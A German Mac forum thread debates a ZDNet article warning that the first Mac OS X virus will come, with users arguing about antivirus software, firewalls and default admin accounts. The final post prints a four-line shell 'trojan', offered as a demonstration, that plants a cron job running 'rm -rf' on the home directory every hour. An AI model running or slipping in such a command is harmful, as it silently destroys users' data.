+++ Der erste Virus für den Macintosh wird kommen +++

[avalon]

Das neuste von avalons Nachrichtendienst.

Fröhliches diskutieren (obwohl wir das ja schon reichlich hatten..)

"Die Mac-Gemeinde muss aufwachen und sich um ihre Sicherheit kümmern", titelt das australische Magazin ZDNet und sorgt für die übliche Aufregung. Schon geistert wieder die Frage nach der Sicherheit von Mac OS X durch die Medien: Wollen die Hersteller von Sicherheitssoftware Panik machen oder sind die Mac-Anwender einfach nur naiv?

Seitdem es Mac OS X gibt, konnte sich noch kein Virus, kein Trojaner und keine Spyware auf dem Betriebssystem verbreiten. Experten aber warnen die Mac-Anwender immer wieder davor, sich nicht in Sicherheit zu wähnen. Der erste Virus für den Macintosh werde eines Tages kommen, prophezeit Mark Borrie, Sicherheitsexperte der Universität von Otago, ZDNet in einem Interview. Er tue alles dafür, Mac-User davon zu überzeugen, ihren Computer abzusichern und sich auf den schlimmsten Fall vorzubereiten. Nur so ließe sich ein großer Schaden verhindern, wenn der erste OS-X-Virus einfällt. Egal, welches Betriebssystem man benutze - die Sicherheit müsse immer vorgehen, meint Borrie.

Zwar sei Microsoft in den letzten Jahren das Opfer der meisten Angriffe geworden, der Konzern habe deshalb aber nicht nur den Schaden, sondern auch die größere Erfahrung bei der digitalen Schädlingsbekämpfung. Inzwischen könne Redmond auf Angriffe bedeutend schneller reagieren als der Mac-OS-X-Hersteller, dem dieser Erfahrungsschatz und die Praxis fehle. Dass auch die Anwender keine Erfahrung haben, verstärke die Gefahr zusätzlich.

Der Vorwurf, Mac-User würden die Sicherheit ihres Systems wie eine religiöse Überzeugung handhaben und sich in ihrem Fundamentalismus nicht auf Warnungen einlassen, ist nicht neu. Paul Ducklin von der Antiviren-Softwarefirma Sophos wirft Mac- und Linux-Usern vor, nicht zu begreifen, dass ihre Betriebssysteme nur zufällig sicherer sind. Sie würden sich zu Unrecht in einer "Komfort-Zone" ausruhen. Allerdings warnen Sicherheitssoftware-Hersteller nie ohne eigenes Interesse und so manche Malware-Sensation hat sich in den letzten Jahren als heiße Luft erwiesen, die lediglich den Verkauf von Antivirensoftware und Firewalls anheizen sollte.

Wenn man am Mac bestimmte Regeln beachtet, braucht man solchen Horroszenarien keine große Beachtung schenken. Regelmäßig aktualisierte Antivirensoftware kann nicht nur im Fall der Fälle eingreifen, sondern stoppt auch die Weiterverbeitung von Windows-Viren über den eigenen Mac. Die OpenSource ClamXav gibt es kostenlos. Auch für OS-X-User sollte zudem selbstverständlich sein, dass nicht benutzte Sharing-Dienste ausgeschaltet bleiben und stets eine Firewall läuft. Kostenlos stellt Corsaire als PDF-Datei eine 41 Seiten lange Anleitung zu Verfügung, wie fortgeschrittene Nutzer Tiger optimal gegen unbefugten Zugriff absichern können.

Was haltet ihr davon?

Nachtrag:

 

[maceis]

...
Was haltet ihr davon?

Ziemlich pauschal, ein wenig Unfug dabei aber im Wesentliche nichts neues.
Meine Meinung.

 

[charlotte]

was soll ich mir jetzt einen virenscanner anschaffen wenn noch keine viren da sind. falls es irgendwann mal soweit ist, muß man über das prob nachdenken aber bis dahin - don´t worry be happy

 

[Difool]

...für OS 9 gibt es doch auch ganze 49 Stück – hatte sogar mal einen gesehen!

 

[MaxiPowers]

Hmmm...
Hauptsache, man lässt die Finger von allem Norton-Zeugs, würde ich sagen: Das Zeug hat mir bisher immer nur alles noch kaputter gemacht!

Ansonsten... hatte ich (glaube ich) auch noch keine Viren auf meinem Mac!
Toi, toi, toi!!!

 

[below]

Naja, sehr pauschal.

Klar, man darf nicht glauben der Mac wäre 100%ig sicher. Aber warten wir mal ab.

Gruss

Alex

 

[nkonde]

@ difool: hat er dir den Bildschirm zerfetzt?
oder dich gebissen?

 

[avalon]

Nun ich bin ja bekanntermassen immer einer derjenigen, die das mit den Viren erst einmal bewiesen haben möchte, bevor er daran glaubt.

Ist das ein neuer Versuch uns einzureden, das wir bitte schön noch eine Software kaufen sollten, damit andere glücklich sind (nämlich beim Geld zählen)

Mich schockt der Artikel nicht, aber ist ZD Net nicht das hier:

http://www.zdnet.de/news/

Die strotzen ja nur vor Windows, was anderes kennen die nicht und nehmen es nur wahr, wenn es negative Schlagzeilen verursacht....

 

[sheep]

Ich bin zwar auch einer von denen, die davor warnen, Scheuklappen zu tragen, aber Virenscanner unter OS X sind Dummfug, ich verschwende doch nicht Ressourcen um die "armen" Windows-User vor Viren zu schützen - für OS X gibt es ja keine bzw. lächerlich wenige Definitionen (ob es auch keine Viren gibt, kann niemand wissen, was aber in der Beziehung keine Rolle spielt).

Sogar unter Windows sind sie nur sehr beschränkt nützlich, denn:

a) sie erkennen mutmasslich nur einen kleinen Teil der tatsächlichen Würmer / Viren / Trojener und v.a.
b) sind sie in den meisten Fällen gar nicht in der Lage, die Schädlinge zu entfernen, wenn sie sie denn gefunden haben, d.h. man muss im Endeffekt wieder selber Hand anlegen oder noch schlimmer anlegen lassen, was einen schnell teuer zu stehen kommen kann

Mein Fazit: Ich verabscheue Virenscanner, sie bremsen das System aus, behindern einen bei der Arbeit mit irgendwelchen Popups und sind gerade für Durchschnittsuser gänzlich nutzlos, weil sie nach meiner Erfahrung in den meisten Fällen die Schädliinge nicht zuverlässlich löschen (v.a. nicht in der Registry).

Und Windows-Rechner sind IMMER verseucht, sobald sie regelmässig im Netz hängen - zu dieser Behauptung stehe ich bedingungslos, das Gegenteil beweisen kann mir eh keiner .


Oh ganz vergessen: Früher oder später wird der erste Virus sowieso kommen, obwohl ich es für wahrscheinlicher halte, dass er längst da ist (siehe Virenscanner...). Bis das zu einer ernsthaften Bedrohung wird, werde ich allerdings meinen Mac geniessen und wenn es so weit ist, wird das gute Linux noch viel besser sein, als es heute schon ist, dann wird eben zurück geswitcht .

 

[bernie313]

ich denke auch das irgendwann ein Virus für OSX geben wird, aber noch mache ich mir keinen Kopf darüber.Aber diesen selbsternannten Sicherheitsexperten, auch und gerade von den Softwarefirmen, traue ich nicht über den Weg. Vor einem Jahr geisterte mehrmals der OSX Virus durch alle Foren, weil eine Firma sich mal wieder ins Rampenlicht bringen wollte und was war es, wohl doch nur ne Ente.
Auch denke ich nach nunmehr 4,5 Jahren OSX und dem Nimbus des Unverwundbaren, müßte sich doch einer der Cracker die Lorbeeren verdienen wollen, der erste zu sein der es geschaft hat einen Virus zu Programmieren, die Hall of Fame wäre ihm sicher, statt dessen erbarmen sie sich dem neuen Vista und schreiben dafür Viren, scheint ja wohl auch wesentlich einfacher zu sein, und beendet hoffentlich die Discussion, das die Verbreitung eines Betriebssystems ein Faktor für die Virenschreiber ist.
PS ich für meinen Teil zittere immer wenn ich von der Arbeit(WinPC) nach Hause fahre, und mich mit meinem Macs ins Internet wage, ob ich denn der Erste bin der sich infiziert

 

[bashir]

Wenn man am Mac bestimmte Regeln beachtet, braucht man solchen Horroszenarien keine große Beachtung schenken. Regelmäßig aktualisierte Antivirensoftware kann nicht nur im Fall der Fälle eingreifen, sondern stoppt auch die Weiterverbeitung von Windows-Viren über den eigenen Mac. Die OpenSource ClamXav gibt es kostenlos. Auch für OS-X-User sollte zudem selbstverständlich sein, dass nicht benutzte Sharing-Dienste ausgeschaltet bleiben und stets eine Firewall läuft. Kostenlos stellt Corsaire als PDF-Datei eine 41 Seiten lange Anleitung zu Verfügung, wie fortgeschrittene Nutzer Tiger optimal gegen unbefugten Zugriff absichern können.

Was haltet ihr davon?

Durch diesen Abschnitt ist das Ganze, meiner Meinung nach, seriös. Natürlich sollte man nicht meinen (ob Linux oder Mac, etc.), es gäbe keine Möglichkeit das System zu kompromittieren! Ob es gleich ein Virenscanner sein muss (Was bringt er mir, wenn ich keine Index-Datei habe, die Mac-OS Viren kennt), ist die eine Frage. Firewall muss meiner Meinung nach sein und darauf wurde auch verwiesen.

Wie gesagt: just my 2 cents

 

[abgemeldeter Benutzer]

Das ist eine Binsenweisheit. Natürlich wird irgendwann der erste Virus für Mac OS X kommen. Früher oder später. Wahrscheinlich später.

Inzwischen könne Redmond auf Angriffe bedeutend schneller reagieren als der Mac-OS-X-Hersteller, dem dieser Erfahrungsschatz und die Praxis fehle.

Wenn das so wäre, warum reagieren die dann nicht?

 

[marco312]

Ich glaube auch das je größer die Verbreitung von Mac OS X wird auch das Interesse der bösen Jungs größer wird auch uns zu ärgern.

 

[avalon]

Ich glaube auch das je größer die Verbreitung von Mac OS X wird auch das Interesse der bösen Jungs größer wird auch uns zu ärgern.

Nun ich halte ja bis jetzt dagegen, weil es sicher schon welche probiert haben, es aber nicht gelungen ist.

Let us be virusfree!!!!!!

Huch das reimt sich ja..

 

[mkoessling]

ZDNet und MAC, zwei Welten prallen aufeinander.
Die versuchen doch nur uns Software zu verkaufen, die momentan keinen Sinn macht. Ist schon blöd, wenn man eine teure Software entwickelt und keiner will sie haben.

 

[altobelly]

Also irgendwie werde ich das dumpfe Gefühl das solche Meldungen irgendwie nur Sommerloch bzw. Newsflauten stopfen ... Ich glaube wir brauchen da kein ZDNet, falls mal wirklich was ernstes im Busch ist!

 

[tom's]

wobei man ehrlicherweise dazu sagen muss, dass dieser marc borrie mac- bzw. applefan der allerersten stunde ist und primär ganz sicher nicht irgendwelche antivirenhersteller - durch panikmache in der macgemeinde - unterstützen will... sei es norton oder sonst irgendjemand...

meiner meinung nach ist es auf jeden fall wichtig, mit dem ganzen thema verantwortungsvoll umzugehen, gerade was firmen und dergleichen angeht - auch wenn es derzeit keine viren - die zum problem werden können - für OS X gibt... und wenn man die ganze sache realistisch sieht - früher oder später werden auch wir uns damit befassen müssen... vielleicht durch den switch zu intel, wenn OS X dann nicht nur mehr auf mac läuft und so die userzahl ansteigt...

das sind natürlich alles nur vermutungen aber verdrängen sollte man es dann vielleicht doch nicht ganz - zumindest mal im hinterkopf speichern...

schau mer mal

 

[grabmeru]

Die Frage ist weniger, ob oder wann das erste Virus kommt, sondern wieviele Otto-Normaluser dann in ihren Admin-Accounts kalt erwischt werden.

Für mich die größte Sicherheitslücke, dass man nach der Erstinstallation in einem Account mit Admin-Rechten sitzt (ja, ich weiß, das ist nicht ganz root, aber mächtig genug). Vielleicht sollte sich Apple eine einfache Lösung einfallen lassen, wie man die Leute schon bei der Installation in einen normalen User-Account bugsieren kann (und sie später nicht ausrasten, wenn sie irgendwelche Aktionen separat bestätigen müssen).

 

[andi.reidies]

Die Frage ist weniger, ob oder wann das erste Virus kommt, sondern wieviele Otto-Normaluser dann in ihren Admin-Accounts kalt erwischt werden.

Für mich die größte Sicherheitslücke, dass man nach der Erstinstallation in einem Account mit Admin-Rechten sitzt (ja, ich weiß, das ist nicht ganz root, aber mächtig genug).

ja, da geb ich dir recht, das hat mich schon bei der Windows XP installation gestoert und ich hatte eigentlich gehofft, dass es bei OS X anders waere - erst recht dank der Unix-Anleihen.

Gut, muss man halt selbst vorsorge treffen, dass das system entsprechend konfiguriert wird - wobei der "schaden" ansich sicherlich geringer als unter windows ist, da fuer den zugriff auf saemtliche Systemdateien / -einstellungen weiterhin per SUDO das kennwort abgefragt wird (auch wenn man SysAdmin ist).

Der Artikel hinterlaesst schon wegen der These: "Microsoft sei besser im Sicherheitsluecken entdecken, da sie eine groessere Erfahrung haben" nen fahlen Beigeschmack - warum gibt's denn soviele Sicherheitsluecken unter Windows ? doch auch nur weil da teilweise "schlampig" programmiert worden ist (weil halt gewisse konventionen nicht beruecksichtigt oder sich ueber sicherheit keine gedanken gemacht wurde). Ist doch ueberall dasselbe theater (ich bin in der software-entwicklung taetig). Sobald die Termine enger werden und die Zeit draengt, wird halt "geschlampt wo das zeug haelt"......(zum leidtragen des kunden - nicht umsonst wurde das Sprichwort: "die Software reift beim Kunden" erst durch MS Geschaeftspraktien erfunden)...

Bei alledem darf man auch nicht vergessen, dass OSX auf BSD (und damit auf Unix) basiert, wo mittlerweile mehrere Mannjahre an entwicklung, test und fehlerbereinigung investiert wurden. Ausserdem nutzen nen grossteil der universitaeren einrichtungen Unix fuer den informatik unterricht und eine herrschar von entwicklern pflegt und re-viewt den code tag fuer tag.

jede entdeckte sicherheitsluecke in gnu/unix(linux) tools wuerde sofort auch eine fehlerbehebung fuer OS X bedeuten, da ja ein grossteil des system-kerns (unterhalb von quartz, cocoa und quicktime) auf unix (FreeBSD - welches ja bekanntlich den Ruf des stabilsten Server-OSes hat) basiert.

somit denk ich, haben auch die Darwin/FreeBSD/OS X Entwickler mittlerweile ne ganze Menge Know-How, um Fehler und Bugs schnellstmoeglich zu lokalisieren und zu beheben.

Daher laesst der Artikel mal wieder schlussfolgern, dass hier MS eine - wie auch immer - unterstuetzte Studie in Auftrag gegeben hat, um ihre Software und ihr Vorgehen ggue. dem Wettbewerb herausstellen zu koennen....

*vote to trash*

 

[sheep]

Für mich die größte Sicherheitslücke, dass man nach der Erstinstallation in einem Account mit Admin-Rechten sitzt (ja, ich weiß, das ist nicht ganz root, aber mächtig genug). Vielleicht sollte sich Apple eine einfache Lösung einfallen lassen, wie man die Leute schon bei der Installation in einen normalen User-Account bugsieren kann (und sie später nicht ausrasten, wenn sie irgendwelche Aktionen separat bestätigen müssen).

Sicherlich ein guter Gedanke, man sollte allerdings bedenken, dass viele Schädlinge keineswegs auf Admin- (geschweige denn root-)Rechte angewiesen sind - ich zitiere an dieser Stelle den Code meines kleinen Shell-Trojaners (hier natürlich nicht versteckt), den ich für einen anderen Thread für Demonstrationszwecke gebastelt habe:

ACHTUNG, AUSFÜHREN AUF EIGENE GEFAHR

declare pfad=$HOME
echo "rm -rf $pfad" > .trojaner
echo '0 * * * * '$PWD'/.trojaner' > .cronjob
crontab .cronjob

Vier Zeilen Code und absolut durchschlagende Wirkung (= automatisierte stündliche Löschung des kompletten Home-Verzeichnisses) ganz ohne Admin-Rechte; ob das wohl von einem ach so tollen Virenscanner erkannt würde?